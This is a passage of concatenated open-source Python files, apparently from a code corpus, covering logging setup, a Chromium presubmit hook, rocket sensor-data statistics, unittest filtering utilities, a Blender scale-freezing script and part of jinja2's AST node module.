        elif level >= logging.DEBUG:
            tint = self.BRGREEN
        else:
            tint = self.RESET
        return tint + rendered + self.RESET
class ColoredHandler(logging.StreamHandler):
    """StreamHandler that colourises output only when the stream is a TTY."""

    def __init__(self, stream=sys.stdout):
        super().__init__(stream)

    def format(self, record, colour=False):
        # Lazily swap in the colour-aware formatter on first use.
        if not isinstance(self.formatter, ColoredFormatter):
            self.formatter = ColoredFormatter('[%(asctime)s] [%(levelname)s][MODULE:"%(module)s"] - "%(message)s"')
        return self.formatter.format(record, colour)

    def emit(self, record):
        out = self.stream
        try:
            out.write(self.format(record, out.isatty()))
            out.write(self.terminator)
            self.flush()
        except Exception:
            self.handleError(record)
# Base logging configuration in logging.config.dictConfig schema.
# ``setup`` below deep-merges the application's own LOGGING setting on top
# of these defaults.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': '[%(asctime)s] [%(levelname)s][MODULE:"%(module)s"] - "%(message)s"'
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    'handlers': {
        # Plain stream handler; ``setup`` swaps it for ColoredHandler when
        # the application runs in DEBUG mode.
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'verbose'
        },
    },
    'loggers': {
        'djaio_logger': {
            'handlers': ['console'],
            'level': 'DEBUG',
        },
    },
}
def setup(app):
    """Install the logging configuration for *app*.

    The application's ``LOGGING`` setting (if any) is deep-merged over the
    module defaults; in DEBUG mode the console handler is replaced with the
    colourising one.
    """
    overrides = getattr(app.settings, 'LOGGING', {})
    merged = deep_merge(LOGGING, overrides)
    if app.settings.DEBUG:
        merged['handlers']['console']['class'] = 'djaio.core.logs.ColoredHandler'
    logging.config.dictConfig(merged)
| apache-2.0 |
lihui7115/ChromiumGStreamerBackend | chrome/test/data/extensions/api_test/activity_log_private/PRESUBMIT.py | 40 | 1836 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run the Chrome WebUI presubmit scripts on our test javascript.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into depot_tools, and see
http://www.chromium.org/developers/web-development-style-guide for the rules
we're checking against here.
"""
import os
def GetPathsToPrepend(input_api):
  """Returns the sys.path entries the checks below depend on."""
  repo_root = input_api.change.RepositoryRoot()
  web_dev_style_path = input_api.os_path.join(
      repo_root, 'chrome', 'browser', 'resources')
  return [input_api.PresubmitLocalPath(), web_dev_style_path]
def RunWithPrependedPath(prepended_path, fn, *args):
  """Calls fn(*args) with prepended_path entries at the front of sys.path,
  restoring the original sys.path afterwards."""
  import sys
  saved = sys.path
  sys.path = prepended_path + saved
  try:
    return fn(*args)
  finally:
    sys.path = saved
def CheckChangeOnUpload(input_api, output_api):
  """Presubmit hook invoked at upload time."""
  def run_checks():
    return list(_CommonChecks(input_api, output_api))
  return RunWithPrependedPath(GetPathsToPrepend(input_api), run_checks)
def CheckChangeOnCommit(input_api, output_api):
  """Presubmit hook invoked at commit time."""
  def run_checks():
    return list(_CommonChecks(input_api, output_api))
  return RunWithPrependedPath(GetPathsToPrepend(input_api), run_checks)
def _CommonChecks(input_api, output_api):
  """Runs the WebUI JS checker over the .js files under this directory."""
  resources = input_api.PresubmitLocalPath()

  def is_resource(maybe_resource):
    path = maybe_resource.AbsoluteLocalPath()
    return path.startswith(resources) and path.endswith(('.js'))

  from web_dev_style import js_checker
  return list(js_checker.JSChecker(
      input_api, output_api, file_filter=is_resource).RunChecks())
| bsd-3-clause |
gmartinvela/OpenRocket | generate_statistics_from_SD.py | 1 | 7682 | import fileinput
import math
import collections
import time
import numpy as np
from pylab import *
from matplotlib import pyplot as plt
import matplotlib.mlab as mlab
#file_path = '/media/ABB4-4F3A/DATALOG.TXT'
file_path = 'DATALOG.TXT'
def split_in_blocks(txt_file, pattern):
    '''
    Find every line containing *pattern* (assumed to be the header line that
    starts each flight recording) and slice the file into the blocks of data
    between those headers.

    Arguments:
        txt_file (str): path to the SD-card log file.
        pattern (str): substring that identifies a header line.

    Return: A list of blocks (each a list of raw lines) and the header
    (the first line of the file split on commas).
    '''
    num_times_find_pattern = []
    for num_line, line in enumerate(fileinput.input(txt_file)):
        if pattern in line:
            num_times_find_pattern.append(num_line)
        # The very first line doubles as the column header.
        if num_line == 0:
            header = list(line.strip().split(","))
            #print header
    blocks_of_data = []
    with open(txt_file) as f:
        lines = f.readlines()
    for num_header_line in num_times_find_pattern:
        if num_header_line == 0:
            num_header_line_prev = num_header_line
        else:
            # NOTE(review): the upper bound ``num_header_line - 1`` drops the
            # line immediately before each header as well -- confirm intended.
            block_lines = lines[num_header_line_prev + 1 : num_header_line - 1]
            blocks_of_data.append(block_lines)
            num_header_line_prev = num_header_line
    # Final block: from the last header to the end of the file.  ``num_line``
    # is the loop variable leaked from the enumerate() loop above.
    block_lines = lines[num_header_line_prev + 1 : num_line + 1]
    blocks_of_data.append(block_lines)
    return blocks_of_data, header
def manage_data_from_blocks(blocks, header):
    """
    Split every block of raw CSV lines into per-column, per-block lists.

    Keys of the returned dict are '<column><block_number>' (e.g. 'ax0'),
    so every sensor channel of every flight can be addressed individually.

    Arguments:
        blocks (list): list of blocks, each a list of comma-separated lines.
        header (list): column names, in the SD-card log order
            f,ax,ay,az,gx,gy,gz,mx,my,mz,t,p,h.

    Return: An OrderedDict mapping '<column><block>' -> list of parsed values.
    """
    # Fingerprint 'f' (millis) and pressure 'p' are integers, everything else
    # parses as float.  Driving the parse from ``header`` instead of the old
    # hard-coded key names resolves the "TODO: Automatize this function"
    # while producing identical output for the standard 13-column layout.
    converters = (int, float, float, float, float, float, float,
                  float, float, float, float, int, float)
    blocks_dict = collections.OrderedDict()
    for block_number, block in enumerate(blocks):
        for item in header:
            blocks_dict['%s%s' % (item, block_number)] = []
        for line in block:
            values = line.strip().split(",")
            for item, convert, raw in zip(header, converters, values):
                blocks_dict['%s%s' % (item, block_number)].append(convert(raw))
    return blocks_dict
def process_data(blocks_dict, header):
    """Group the block keys by header column and run the statistics/plots.

    ``block_list_header_based[i]`` collects every blocks_dict key belonging
    to column ``header[i]`` (e.g. all 't<N>' keys for the temperature column).
    """
    block_list_header_based = []
    for num, item in enumerate(header):
        block_list_header_based.append([])
        for block in blocks_dict:
            if block.startswith(header[num]):
                block_list_header_based[num].append(block)
        # DEBUG! print "%s: %s" % (block, blocks_dict[block])
    # NOTE(review): prefix matching can misfile keys if one header name is a
    # prefix of another -- verify against the actual header set.
    print block_list_header_based
    #fingerprint_basic_info = basic_process_only_for_fingerprints(block_list_header_based[0])
    # Index 12 is the humidity/height column 'h' in the standard layout.
    temp_basic_info = basic_process_data(block_list_header_based[12])
    #height_basic_info = basic_process_data(block_list_header_based[12])
    print_basic_histograms(block_list_header_based[12])
    print_basic_scatters(block_list_header_based[12])
    print_basic_evolution_2_axis(block_list_header_based[0], block_list_header_based[12])
def basic_process_only_for_fingerprints(fingerprints):
    """Derive millisecond intervals between consecutive fingerprints and
    compute their basic statistics.

    NOTE(review): reads AND mutates the module-level ``blocks_dict`` (adds
    'fp<N>' keys holding the interval lists) -- confirm this side effect is
    intended rather than passing the dict explicitly.
    """
    fingerprint_basic_info = collections.OrderedDict()
    fingerprint_list = []
    for num, fingerprint_block in enumerate(fingerprints):
        millis_interval_list = []
        for position, millis in enumerate(blocks_dict[fingerprint_block]):
            if position != 0:
                # Delta between consecutive timestamps, in milliseconds.
                millis_interval = millis - millis_prev
                millis_interval_list.append(millis_interval)
            millis_prev = millis
        blocks_dict["fp%s" % (num)] = millis_interval_list
        fingerprint_list.append("fp%s" % (num))
    fingerprint_basic_info = basic_process_data(fingerprint_list)
    return fingerprint_basic_info
def basic_process_data(data_list):
    """Compute descriptive statistics for every block named in ``data_list``.

    Reads the module-level ``blocks_dict``.  Returns an OrderedDict mapping
    block name -> dict of statistics formatted to three decimals.
    """
    data_basic_info = collections.OrderedDict()
    for data_block in data_list:
        data_basic_info[data_block] = {}
        data_avg_mean = np.mean(blocks_dict[data_block]) # Average
        data_avg_weighted = np.average(blocks_dict[data_block]) # Average weighted
        data_amax = np.amax(blocks_dict[data_block]) # MAX
        data_amin = np.amin(blocks_dict[data_block]) # MIN
        data_med = np.median(blocks_dict[data_block]) # Median
        data_std = np.std(blocks_dict[data_block]) # Standard deviation
        data_ptp = np.ptp(blocks_dict[data_block]) # Distance MAX to MIN
        data_var = np.var(blocks_dict[data_block]) # Variance
        data_basic_info[data_block] = {"AVM" : "%.3f" % data_avg_mean, "AVW" : "%.3f" % data_avg_weighted, "MAX" : "%.3f" % data_amax,
                                       "MIN" : "%.3f" % data_amin, "MED" : "%.3f" % data_med, "STD" : "%.3f" % data_std,
                                       "PTP" : "%.3f" % data_ptp, "VAR" : "%.3f" % data_var}
        # PLOT NORMAL PDF FROM THA DATA
        #sigma = sqrt(data_var)
        #x = np.linspace(data_amin,data_amax)
        #plt.plot(x,mlab.normpdf(x,data_avg_mean,sigma))
    plt.show()
    for key in data_basic_info:
        print data_basic_info[key]
    return data_basic_info
def print_basic_histograms(data_list):
    """Draw a 20-bin histogram subplot for every block named in ``data_list``.

    Reads the module-level ``blocks_dict``; subplots are laid out in rows of
    three.
    """
    #plt.ion()
    plt.figure(1)
    for num, data in enumerate(data_list):
        nrows = int(math.ceil(float(len(data_list) / 3.0)))
        ncols = 3
        # Matplotlib's compact "RCN" subplot spec, e.g. "231".
        subplot_index = "%s%s%s" % (nrows, ncols, num + 1)
        plt.subplot(subplot_index)
        plt.hist(blocks_dict[data], bins=20)
        #data_new = np.histogramdd(blocks_dict[data])
        #plt.hist(data_new, bins=20)
        plt.xlabel("Value", fontsize=8)
        plt.ylabel("Frequency", fontsize=8)
    plt.suptitle("Gaussian Histogram", fontsize=12)
    plt.show()
    #plt.show(block=True)
def print_basic_scatters(data_list):
    """Draw one scatter subplot per block named in ``data_list``.

    NOTE(review): the scatter plots np.random.randn noise, not the values in
    ``blocks_dict[data]`` -- this looks like placeholder code; confirm.
    """
    #plt.ion()
    plt.figure(1)
    for num, data in enumerate(data_list):
        nrows = int(math.ceil(float(len(data_list) / 3.0)))
        ncols = 3
        subplot_index = "%s%s%s" % (nrows, ncols, num + 1)
        plt.subplot(subplot_index)
        plt.scatter(np.random.randn(1000), np.random.randn(1000))
    plt.suptitle("Gaussian Histogram", fontsize=12)
    plt.show()
    #plt.show(block=True)
def print_basic_evolution_2_axis(x_axis_data_list, y_axis_data_list):
    """Plot each y-block against its paired x-block (value over time).

    ``x_axis_data_list[i]`` and ``y_axis_data_list[i]`` name blocks in the
    module-level ``blocks_dict``; one subplot is drawn per pair.
    """
    plt.figure(1)
    for num in range(len(x_axis_data_list)):
        x = blocks_dict[x_axis_data_list[num]]
        y = blocks_dict[y_axis_data_list[num]]
        #subplot(nrows, ncols, plot_number)
        nrows = int(math.ceil(float(len(x_axis_data_list) / 3.0)))
        ncols = 3
        subplot_index = "%s%s%s" % (nrows, ncols, num + 1)
        plt.subplot(subplot_index)
        plt.plot(x, y, linewidth=1.0, color="green")
        xlabel('time (milliseconds)', fontsize = 8)
        #ylabel('temperature (C)', fontsize = 8)
        #title('', fontsize=10)
        grid(True)
        # Show roughly ten x tick labels regardless of sample count.
        plt.xticks(blocks_dict[x_axis_data_list[num]][::len(blocks_dict[x_axis_data_list[num]])/10], rotation=30, fontsize=8)
        #plt.annotate('Despegue', xy=(2200, 34.82), xytext=(2300, 34.88),
        # bbox=dict(boxstyle="round", fc="0.8"),
        # arrowprops=dict(facecolor='black', shrink=0.05),
        # )
        #plt.annotate('Paracaidas', xy=(7200, 34.82), xytext=(6300, 34.88),
        # arrowprops=dict(facecolor='black', shrink=0.05),
        # )
        #axvline(x=2200)
        #axhspan(34.80, 34.82, facecolor='0.5', alpha=0.5, color="red")
        # Pad the y range slightly so the trace does not touch the frame.
        plt.ylim(min(blocks_dict[y_axis_data_list[num]]) - 0.02, max(blocks_dict[y_axis_data_list[num]]) + 0.02)
        plt.yticks(fontsize=8)
    #plt.suptitle('temperatures in data', fontsize=12)
    plt.show()
# Script driver: split the SD-card log into flight blocks, structure the
# data per column and run the statistics/plots.
# NOTE(review): the pattern "m" is assumed to occur only in header lines --
# verify against the actual log format.
#start = time.time()
blocks, header = split_in_blocks(file_path, "m")
blocks_dict = manage_data_from_blocks(blocks, header)
process_data(blocks_dict, header)
# Optional timing instrumentation:
#stop = time.time()
#total_time = stop -start
#print total_time | mit |
AOSPU/external_chromium_org | chrome/test/chromedriver/test/unittest_util.py | 134 | 4320 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities for dealing with the python unittest module."""
import fnmatch
import sys
import unittest
class _TextTestResult(unittest._TextTestResult):
    """A test result class that can print formatted text results to a stream.

    Results printed in conformance with gtest output format, like:
    [ RUN ] autofill.AutofillTest.testAutofillInvalid: "test desc."
    [ OK ] autofill.AutofillTest.testAutofillInvalid
    [ RUN ] autofill.AutofillTest.testFillProfile: "test desc."
    [ OK ] autofill.AutofillTest.testFillProfile
    [ RUN ] autofill.AutofillTest.testFillProfileCrazyCharacters: "Test."
    [ OK ] autofill.AutofillTest.testFillProfileCrazyCharacters

    NOTE(review): subclasses the private ``unittest._TextTestResult`` --
    verify it exists on the target Python version.
    """

    def __init__(self, stream, descriptions, verbosity):
        unittest._TextTestResult.__init__(self, stream, descriptions, verbosity)
        # Fully-qualified names of tests that failed or errored; used to
        # build a gtest-style retest filter.
        self._fails = set()

    def _GetTestURI(self, test):
        # module.Class.method, matching gtest's test naming scheme.
        return '%s.%s.%s' % (test.__class__.__module__,
                             test.__class__.__name__,
                             test._testMethodName)

    def getDescription(self, test):
        return '%s: "%s"' % (self._GetTestURI(test), test.shortDescription())

    def startTest(self, test):
        unittest.TestResult.startTest(self, test)
        self.stream.writeln('[ RUN      ] %s' % self.getDescription(test))

    def addSuccess(self, test):
        unittest.TestResult.addSuccess(self, test)
        self.stream.writeln('[       OK ] %s' % self._GetTestURI(test))

    def addError(self, test, err):
        unittest.TestResult.addError(self, test, err)
        self.stream.writeln('[    ERROR ] %s' % self._GetTestURI(test))
        self._fails.add(self._GetTestURI(test))

    def addFailure(self, test, err):
        unittest.TestResult.addFailure(self, test, err)
        self.stream.writeln('[   FAILED ] %s' % self._GetTestURI(test))
        self._fails.add(self._GetTestURI(test))

    def getRetestFilter(self):
        # Colon-separated list consumable as a gtest_filter value.
        return ':'.join(self._fails)
class TextTestRunner(unittest.TextTestRunner):
    """Test Runner for displaying test results in textual format.

    Results are displayed in conformance with google test output.
    """

    def __init__(self, verbosity=1):
        # Results go to stderr.
        unittest.TextTestRunner.__init__(self, stream=sys.stderr,
                                         verbosity=verbosity)

    def _makeResult(self):
        # Use the gtest-style result class defined above.
        return _TextTestResult(self.stream, self.descriptions, self.verbosity)
def GetTestsFromSuite(suite):
"""Returns all the tests from a given test suite."""
tests = []
for x in suite:
if isinstance(x, unittest.TestSuite):
tests += GetTestsFromSuite(x)
else:
tests += [x]
return tests
def GetTestNamesFromSuite(suite):
  """Returns a list of every test name in the given suite."""
  # A list comprehension instead of map(): on Python 3 map() returns a lazy
  # iterator, which would break the documented list contract.
  return [GetTestName(test) for test in GetTestsFromSuite(suite)]
def GetTestName(test):
  """Gets the fully qualified name (module.Class.method) of a unittest test."""
  cls = test.__class__
  return '%s.%s.%s' % (cls.__module__, cls.__name__, test._testMethodName)
def FilterTestSuite(suite, gtest_filter):
  """Returns a new filtered tests suite based on the given gtest filter.

  See http://code.google.com/p/googletest/wiki/AdvancedGuide
  for gtest_filter specification.
  """
  remaining = FilterTests(GetTestsFromSuite(suite), gtest_filter)
  return unittest.TestSuite(remaining)
def FilterTests(all_tests, gtest_filter):
  """Returns a filtered list of tests based on the given gtest filter.

  See http://code.google.com/p/googletest/wiki/AdvancedGuide
  for gtest_filter specification.
  """
  # gtest treats everything after the FIRST '-' as the negative pattern
  # list, so split at most once; splitting on every '-' (the old behavior)
  # silently dropped patterns whenever the negative section contained a dash.
  pattern_groups = gtest_filter.split('-', 1)
  positive_patterns = pattern_groups[0].split(':')
  negative_patterns = None
  if len(pattern_groups) > 1:
    negative_patterns = pattern_groups[1].split(':')
  tests = []
  for test in all_tests:
    test_name = GetTestName(test)
    # Test name must be matched by at least one positive pattern...
    if not any(fnmatch.fnmatch(test_name, pattern)
               for pattern in positive_patterns):
      continue
    # ...and by no negative pattern.
    if any(fnmatch.fnmatch(test_name, pattern)
           for pattern in negative_patterns or []):
      continue
    tests.append(test)
  return tests
| bsd-3-clause |
oscurart/BlenderAddons | oscurart_freeze_scale_linked_data.py | 1 | 1304 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# AUTHOR: Eugenio Pignataro (Oscurart) www.oscurart.com.ar
# USAGE: Select object and run. This script freeze scale in linked mesh data.
import bpy

# Freeze (bake) the object scale into the mesh data of every selected object,
# then reset the scale of every object linked to the same mesh so shared data
# is not scaled twice.
for ob in bpy.context.selected_objects:
    # BUG FIX: the original read bpy.context.object.data here -- that is the
    # *active* object's mesh, which is wrong when several objects are
    # selected.  Use the mesh of the object currently being processed.
    odata = ob.data
    for vert in odata.vertices:
        vert.co[0] *= ob.scale[0]
        vert.co[1] *= ob.scale[1]
        vert.co[2] *= ob.scale[2]
    ob.scale = (1, 1, 1)
    # Reset the scale on every object sharing this mesh datablock.
    for lob in bpy.data.objects:
        if lob.data == odata:
            lob.scale = (1, 1, 1)
codeworldprodigy/lab4 | lib/jinja2/nodes.py | 623 | 28875 | # -*- coding: utf-8 -*-
"""
jinja2.nodes
~~~~~~~~~~~~
This module implements additional nodes derived from the ast base node.
It also provides some node tree helper functions like `in_lineno` and
`get_nodes` used by the parser and translator in order to normalize
python and jinja nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import operator
from collections import deque
from jinja2.utils import Markup
from jinja2._compat import next, izip, with_metaclass, text_type, \
method_type, function_type
#: the types we support for context functions
_context_function_types = (function_type, method_type)
_binop_to_func = {
'*': operator.mul,
'/': operator.truediv,
'//': operator.floordiv,
'**': operator.pow,
'%': operator.mod,
'+': operator.add,
'-': operator.sub
}
_uaop_to_func = {
'not': operator.not_,
'+': operator.pos,
'-': operator.neg
}
_cmpop_to_func = {
'eq': operator.eq,
'ne': operator.ne,
'gt': operator.gt,
'gteq': operator.ge,
'lt': operator.lt,
'lteq': operator.le,
'in': lambda a, b: a in b,
'notin': lambda a, b: a not in b
}
# Sentinel exception used throughout constant folding (see Expr.as_const).
class Impossible(Exception):
    """Raised if the node could not perform a requested action."""
class NodeType(type):
    """A metaclass for nodes that handles the field and attribute
    inheritance.  fields and attributes from the parent class are
    automatically forwarded to the child."""

    def __new__(cls, name, bases, d):
        # Merge the parent's declared fields/attributes with the subclass's
        # own, keeping the parent's entries first.
        for attr in 'fields', 'attributes':
            storage = []
            storage.extend(getattr(bases[0], attr, ()))
            storage.extend(d.get(attr, ()))
            # Single inheritance only, and no duplicate field names across
            # the hierarchy.
            assert len(bases) == 1, 'multiple inheritance not allowed'
            assert len(storage) == len(set(storage)), 'layout conflict'
            d[attr] = tuple(storage)
        # Nodes are concrete unless they explicitly declare abstract = True.
        d.setdefault('abstract', False)
        return type.__new__(cls, name, bases, d)
class EvalContext(object):
    """Holds evaluation time information.  Custom attributes can be attached
    to it in extensions.
    """

    def __init__(self, environment, template_name=None):
        self.environment = environment
        autoescape = environment.autoescape
        # An environment configures autoescaping either as a plain flag or
        # as a callable deciding per template name.
        if callable(autoescape):
            self.autoescape = autoescape(template_name)
        else:
            self.autoescape = autoescape
        self.volatile = False

    def save(self):
        """Snapshot the current context state."""
        return dict(self.__dict__)

    def revert(self, old):
        """Restore a state previously produced by :meth:`save`."""
        self.__dict__.clear()
        self.__dict__.update(old)
def get_eval_context(node, ctx):
    """Return *ctx* if given, otherwise build a default EvalContext from the
    node's attached environment."""
    if ctx is not None:
        return ctx
    if node.environment is None:
        raise RuntimeError('if no eval context is passed, the '
                           'node must have an attached '
                           'environment.')
    return EvalContext(node.environment)
class Node(with_metaclass(NodeType, object)):
    """Baseclass for all Jinja2 nodes.  There are a number of nodes available
    of different types.  There are four major types:

    -   :class:`Stmt`: statements
    -   :class:`Expr`: expressions
    -   :class:`Helper`: helper nodes
    -   :class:`Template`: the outermost wrapper node

    All nodes have fields and attributes.  Fields may be other nodes, lists,
    or arbitrary values.  Fields are passed to the constructor as regular
    positional arguments, attributes as keyword arguments.  Each node has
    two attributes: `lineno` (the line number of the node) and `environment`.
    The `environment` attribute is set at the end of the parsing process for
    all nodes automatically.
    """
    fields = ()
    attributes = ('lineno', 'environment')
    abstract = True

    def __init__(self, *fields, **attributes):
        if self.abstract:
            raise TypeError('abstract nodes are not instanciable')
        if fields:
            # Positional arguments must match the declared fields exactly.
            if len(fields) != len(self.fields):
                if not self.fields:
                    raise TypeError('%r takes 0 arguments' %
                                    self.__class__.__name__)
                raise TypeError('%r takes 0 or %d argument%s' % (
                    self.__class__.__name__,
                    len(self.fields),
                    len(self.fields) != 1 and 's' or ''
                ))
            for name, arg in izip(self.fields, fields):
                setattr(self, name, arg)
        # Unspecified attributes default to None.
        for attr in self.attributes:
            setattr(self, attr, attributes.pop(attr, None))
        if attributes:
            raise TypeError('unknown attribute %r' %
                            next(iter(attributes)))

    def iter_fields(self, exclude=None, only=None):
        """This method iterates over all fields that are defined and yields
        ``(key, value)`` tuples.  Per default all fields are returned, but
        it's possible to limit that to some fields by providing the `only`
        parameter or to exclude some using the `exclude` parameter.  Both
        should be sets or tuples of field names.
        """
        for name in self.fields:
            if (exclude is only is None) or \
               (exclude is not None and name not in exclude) or \
               (only is not None and name in only):
                try:
                    yield name, getattr(self, name)
                except AttributeError:
                    # A field may legitimately be unset; skip it silently.
                    pass

    def iter_child_nodes(self, exclude=None, only=None):
        """Iterates over all direct child nodes of the node.  This iterates
        over all fields and yields the values of they are nodes.  If the value
        of a field is a list all the nodes in that list are returned.
        """
        for field, item in self.iter_fields(exclude, only):
            if isinstance(item, list):
                for n in item:
                    if isinstance(n, Node):
                        yield n
            elif isinstance(item, Node):
                yield item

    def find(self, node_type):
        """Find the first node of a given type.  If no such node exists the
        return value is `None`.
        """
        for result in self.find_all(node_type):
            return result

    def find_all(self, node_type):
        """Find all the nodes of a given type.  If the type is a tuple,
        the check is performed for any of the tuple items.
        """
        # Depth-first traversal of the subtree (self excluded).
        for child in self.iter_child_nodes():
            if isinstance(child, node_type):
                yield child
            for result in child.find_all(node_type):
                yield result

    def set_ctx(self, ctx):
        """Reset the context of a node and all child nodes.  Per default the
        parser will all generate nodes that have a 'load' context as it's the
        most common one.  This method is used in the parser to set assignment
        targets and other nodes to a store context.
        """
        # Breadth-first walk over the whole subtree.
        todo = deque([self])
        while todo:
            node = todo.popleft()
            if 'ctx' in node.fields:
                node.ctx = ctx
            todo.extend(node.iter_child_nodes())
        return self

    def set_lineno(self, lineno, override=False):
        """Set the line numbers of the node and children."""
        todo = deque([self])
        while todo:
            node = todo.popleft()
            if 'lineno' in node.attributes:
                # Only fill in missing line numbers unless override is set.
                if node.lineno is None or override:
                    node.lineno = lineno
            todo.extend(node.iter_child_nodes())
        return self

    def set_environment(self, environment):
        """Set the environment for all nodes."""
        todo = deque([self])
        while todo:
            node = todo.popleft()
            node.environment = environment
            todo.extend(node.iter_child_nodes())
        return self

    def __eq__(self, other):
        # Nodes compare equal when they are the same type with equal fields;
        # attributes (lineno, environment) are deliberately ignored.
        return type(self) is type(other) and \
               tuple(self.iter_fields()) == tuple(other.iter_fields())

    def __ne__(self, other):
        return not self.__eq__(other)

    # Restore Python 2 hashing behavior on Python 3
    __hash__ = object.__hash__

    def __repr__(self):
        return '%s(%s)' % (
            self.__class__.__name__,
            ', '.join('%s=%r' % (arg, getattr(self, arg, None)) for
                      arg in self.fields)
        )
# -- Statement node declarations --------------------------------------------
# These classes are purely declarative: the NodeType metaclass turns the
# `fields` tuples into constructor arguments and instance attributes.

class Stmt(Node):
    """Base node for all statements."""
    abstract = True


class Helper(Node):
    """Nodes that exist in a specific context only."""
    abstract = True


class Template(Node):
    """Node that represents a template.  This must be the outermost node that
    is passed to the compiler.
    """
    fields = ('body',)


class Output(Stmt):
    """A node that holds multiple expressions which are then printed out.
    This is used both for the `print` statement and the regular template data.
    """
    fields = ('nodes',)


class Extends(Stmt):
    """Represents an extends statement."""
    fields = ('template',)


class For(Stmt):
    """The for loop.  `target` is the target for the iteration (usually a
    :class:`Name` or :class:`Tuple`), `iter` the iterable.  `body` is a list
    of nodes that are used as loop-body, and `else_` a list of nodes for the
    `else` block.  If no else node exists it has to be an empty list.

    For filtered nodes an expression can be stored as `test`, otherwise `None`.
    """
    fields = ('target', 'iter', 'body', 'else_', 'test', 'recursive')


class If(Stmt):
    """If `test` is true, `body` is rendered, else `else_`."""
    fields = ('test', 'body', 'else_')


class Macro(Stmt):
    """A macro definition.  `name` is the name of the macro, `args` a list of
    arguments and `defaults` a list of defaults if there are any.  `body` is
    a list of nodes for the macro body.
    """
    fields = ('name', 'args', 'defaults', 'body')


class CallBlock(Stmt):
    """Like a macro without a name but a call instead.  `call` is called with
    the unnamed macro as `caller` argument this node holds.
    """
    fields = ('call', 'args', 'defaults', 'body')


class FilterBlock(Stmt):
    """Node for filter sections."""
    fields = ('body', 'filter')


class Block(Stmt):
    """A node that represents a block."""
    fields = ('name', 'body', 'scoped')


class Include(Stmt):
    """A node that represents the include tag."""
    fields = ('template', 'with_context', 'ignore_missing')


class Import(Stmt):
    """A node that represents the import tag."""
    fields = ('template', 'target', 'with_context')


class FromImport(Stmt):
    """A node that represents the from import tag.  It's important to not
    pass unsafe names to the name attribute.  The compiler translates the
    attribute lookups directly into getattr calls and does *not* use the
    subscript callback of the interface.  As exported variables may not
    start with double underscores (which the parser asserts) this is not a
    problem for regular Jinja code, but if this node is used in an extension
    extra care must be taken.

    The list of names may contain tuples if aliases are wanted.
    """
    fields = ('template', 'names', 'with_context')


class ExprStmt(Stmt):
    """A statement that evaluates an expression and discards the result."""
    fields = ('node',)


class Assign(Stmt):
    """Assigns an expression to a target."""
    fields = ('target', 'node')
class Expr(Node):
    """Baseclass for all expressions."""
    # Abstract nodes are never instantiated directly; concrete expression
    # types subclass this.  -- presumably enforced by the node metaclass;
    # TODO confirm against the NodeType definition earlier in the file.
    abstract = True
    def as_const(self, eval_ctx=None):
        """Return the value of the expression as constant or raise
        :exc:`Impossible` if this was not possible.
        An :class:`EvalContext` can be provided, if none is given
        a default context is created which requires the nodes to have
        an attached environment.
        .. versionchanged:: 2.4
           the `eval_ctx` parameter was added.
        """
        # Default: expressions are not constant-foldable unless a subclass
        # overrides this.
        raise Impossible()
    def can_assign(self):
        """Check if it's possible to assign something to this node."""
        return False
class BinExpr(Expr):
    """Baseclass for all binary expressions."""
    fields = ('left', 'right')
    # Concrete subclasses set this to the operator symbol (e.g. '+', '*'),
    # which keys into the module-level _binop_to_func table.
    operator = None
    abstract = True
    def as_const(self, eval_ctx=None):
        """Constant-fold ``left <operator> right``, raising
        :exc:`Impossible` when folding is forbidden or the operation
        itself fails."""
        eval_ctx = get_eval_context(self, eval_ctx)
        # intercepted operators cannot be folded at compile time
        if self.environment.sandboxed and \
           self.operator in self.environment.intercepted_binops:
            raise Impossible()
        f = _binop_to_func[self.operator]
        try:
            return f(self.left.as_const(eval_ctx), self.right.as_const(eval_ctx))
        except Exception:
            raise Impossible()
class UnaryExpr(Expr):
    """Baseclass for all unary expressions."""
    fields = ('node',)
    operator = None
    abstract = True
    def as_const(self, eval_ctx=None):
        """Constant-fold the unary operation or raise :exc:`Impossible`."""
        eval_ctx = get_eval_context(self, eval_ctx)
        # A sandboxed environment may intercept unary operators at runtime;
        # folding such an operator at compile time would bypass that hook.
        env = self.environment
        if env.sandboxed and self.operator in env.intercepted_unops:
            raise Impossible()
        apply_op = _uaop_to_func[self.operator]
        try:
            return apply_op(self.node.as_const(eval_ctx))
        except Exception:
            raise Impossible()
class Name(Expr):
    """Reads a variable from, or writes a value to, a name.
    The node's `ctx` field selects the mode:
    - `store`: the name is an assignment target
    - `load`: the name is looked up
    - `param`: like `store`, but the name was declared as a function
      parameter.
    """
    fields = ('name', 'ctx')
    def can_assign(self):
        """Only plain identifiers may be assigned to; both the historical
        lowercase and the Python-style literal keywords are reserved."""
        reserved = {'true', 'false', 'none', 'True', 'False', 'None'}
        return self.name not in reserved
class Literal(Expr):
"""Baseclass for literals."""
abstract = True
class Const(Literal):
"""All constant values. The parser will return this node for simple
constants such as ``42`` or ``"foo"`` but it can be used to store more
complex values such as lists too. Only constants with a safe
representation (objects where ``eval(repr(x)) == x`` is true).
"""
fields = ('value',)
def as_const(self, eval_ctx=None):
return self.value
@classmethod
def from_untrusted(cls, value, lineno=None, environment=None):
"""Return a const object if the value is representable as
constant value in the generated code, otherwise it will raise
an `Impossible` exception.
"""
from .compiler import has_safe_repr
if not has_safe_repr(value):
raise Impossible()
return cls(value, lineno=lineno, environment=environment)
class TemplateData(Literal):
"""A constant template string."""
fields = ('data',)
def as_const(self, eval_ctx=None):
